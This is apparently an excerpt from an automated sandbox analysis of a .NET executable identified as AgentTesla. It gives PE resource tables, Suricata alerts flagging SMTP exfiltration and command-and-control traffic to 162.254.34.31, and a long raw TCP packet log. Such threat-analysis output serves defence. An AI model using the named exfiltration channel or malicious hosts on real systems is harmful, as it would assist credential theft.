.reloc	0x86000	0xc	0x200	a013b057479700ea0df7549d955e4092	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x162b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.6170212765957447
RT_ICON	0x16718	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	0.4598360655737705
RT_ICON	0x170a0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.3818011257035647
RT_ICON	0x18148	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.28226141078838174
RT_ICON	0x1a6f0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.22691308455361361
RT_ICON	0x1e918	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	0.16452070632751734
RT_ICON	0x27dc0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.12943629480657753
RT_ICON	0x385e8	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	0.07427434387667545
RT_ICON	0x7a610	0xa775	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced	0.970771419907159
RT_GROUP_ICON	0x84d88	0x84	data	0.7045454545454546
RT_VERSION	0x84e0c	0x3c8	data	0.40289256198347106
RT_MANIFEST	0x851d4	0x1b4	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators	0.5642201834862385

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-25T14:47:21.747037+0100	2030171	ET MALWARE AgentTesla Exfil Via SMTP	1	192.168.2.4	49757	162.254.34.31	587	TCP
2024-11-25T14:47:21.747037+0100	2840032	ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	1	192.168.2.4	49757	162.254.34.31	587	TCP
2024-11-25T14:47:46.266953+0100	2855245	ETPRO MALWARE Agent Tesla Exfil via SMTP	1	192.168.2.4	49743	162.254.34.31	587	TCP
2024-11-25T14:47:46.266953+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49743	162.254.34.31	587	TCP
2024-11-25T14:48:13.004462+0100	2855245	ETPRO MALWARE Agent Tesla Exfil via SMTP	1	192.168.2.4	49757	162.254.34.31	587	TCP
2024-11-25T14:48:13.004462+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49757	162.254.34.31	587	TCP
2024-11-25T14:49:22.543441+0100	2030171	ET MALWARE AgentTesla Exfil Via SMTP	1	192.168.2.4	49743	162.254.34.31	587	TCP
2024-11-25T14:49:22.543441+0100	2840032	ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	1	192.168.2.4	49743	162.254.34.31	587	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 14:47:22.166501045 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:22.166543007 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:22.166613102 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:22.184220076 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:22.184242010 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:23.450870991 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:23.451062918 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:23.512252092 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:23.512304068 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:23.512658119 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:23.563074112 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:23.884465933 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:23.931337118 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.536573887 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.542457104 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.542489052 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.542515993 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.542525053 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.542541981 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.542551994 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.542557955 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.542586088 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.551647902 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.562796116 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.562863111 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.562881947 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.610027075 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.610061884 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.656780958 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.656810999 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.656848907 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.656900883 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.744823933 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.748661041 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.748738050 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.748778105 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.756444931 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.756634951 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.756644011 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.764323950 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.764404058 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.764414072 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.772377014 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.772437096 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.772447109 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.780380964 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.780576944 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.780584097 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.788228035 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.788292885 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.788299084 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.796046019 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.796101093 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.796114922 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.808870077 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.808989048 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.809046984 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.809065104 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.809195995 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.815490007 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.821849108 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.821907997 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.821913004 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.821922064 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.821973085 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.828453064 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.834861994 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.834922075 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.834930897 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.875586033 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.945964098 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.952133894 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.952207088 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.952223063 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.961848974 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.961858988 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.961976051 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.961986065 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.970978975 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.971077919 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.971088886 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.971141100 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.975501060 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.975512981 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.975603104 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.979790926 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.979851007 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.984343052 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.984355927 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.984416962 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.993426085 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:24.993501902 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:24.997634888 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.002172947 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.002240896 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.002255917 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.002315044 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.011003017 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.011077881 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.015513897 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.015587091 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.019972086 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.020055056 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.028804064 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.028882027 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.037766933 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.037830114 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.042357922 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.042422056 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.051703930 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.051783085 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.059942007 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.060022116 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.149529934 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.149614096 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.153145075 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.153218031 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.160041094 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.160144091 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.166872025 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.166934967 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.173451900 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.173512936 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.176186085 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.176260948 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.182358980 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.182435036 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.185321093 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.185384989 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.191220999 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.191287994 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.194214106 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.194277048 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.200217962 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.200288057 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.206187010 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.206257105 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.212271929 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.212363958 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.212384939 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.217956066 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.218049049 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.218067884 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.218121052 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.220973015 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.221072912 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.227044106 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.227145910 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.232938051 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.233042955 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.236004114 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.236076117 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.241815090 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.241879940 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.247756004 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.247829914 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.267524958 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.267601967 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.271894932 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.271985054 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.287267923 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.287278891 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.287322998 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.287364960 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.287385941 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.287399054 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.328697920 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.358927965 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.358938932 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.358977079 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.359034061 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.359056950 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.359098911 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.359119892 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.372735023 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.372750998 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.372874022 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.372884989 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.372936010 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.386214972 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.386231899 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.386339903 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.386352062 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.386396885 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.395709038 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.395725965 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.395967960 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.395979881 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.396030903 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.405061960 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.405078888 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.405152082 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.405162096 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.405206919 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.412051916 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.412069082 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.412159920 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.412172079 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.412216902 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.420166969 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.420181990 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.420257092 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.420264959 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.420310020 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.549767017 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.549784899 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.549873114 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.549894094 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.549942017 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.555588961 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.555604935 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.555669069 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.555679083 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.555707932 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.555723906 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.561942101 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.561956882 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.562021017 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.562028885 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.562073946 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.567718983 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.567734003 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.567806005 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.567814112 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.567864895 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.574006081 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.574021101 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.574085951 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.574094057 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.574136972 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.579946995 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.579962015 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.580035925 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.580044985 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.580085993 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.586364031 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.586379051 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.586483002 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.586492062 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.586548090 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.592735052 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.592750072 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.592822075 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.592839003 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.592886925 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.751415014 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.751446962 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.751537085 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.751570940 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.751614094 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.757200003 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.757225990 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.757325888 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.757344007 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.757409096 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.763695002 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.763716936 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.763808012 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.763825893 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.763870955 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.769073009 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.769087076 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.769277096 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.769306898 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.769356966 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.775510073 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.775531054 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.775598049 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.775608063 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.775645018 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.775664091 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.781508923 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.781524897 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.781629086 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.781636000 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.781696081 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.787816048 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.787831068 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.787897110 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.787903070 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.787919044 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.787949085 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.794176102 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.794189930 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.794256926 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.794264078 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.794301033 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.953450918 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.953474998 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.953563929 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.953588963 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.953646898 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.958997011 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.959013939 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.959095955 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.959104061 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.959146976 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.965356112 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.965373993 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.965552092 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.965562105 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.965607882 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.970885992 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.970902920 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.970983982 CET	49737	443	192.168.2.4	172.67.129.178
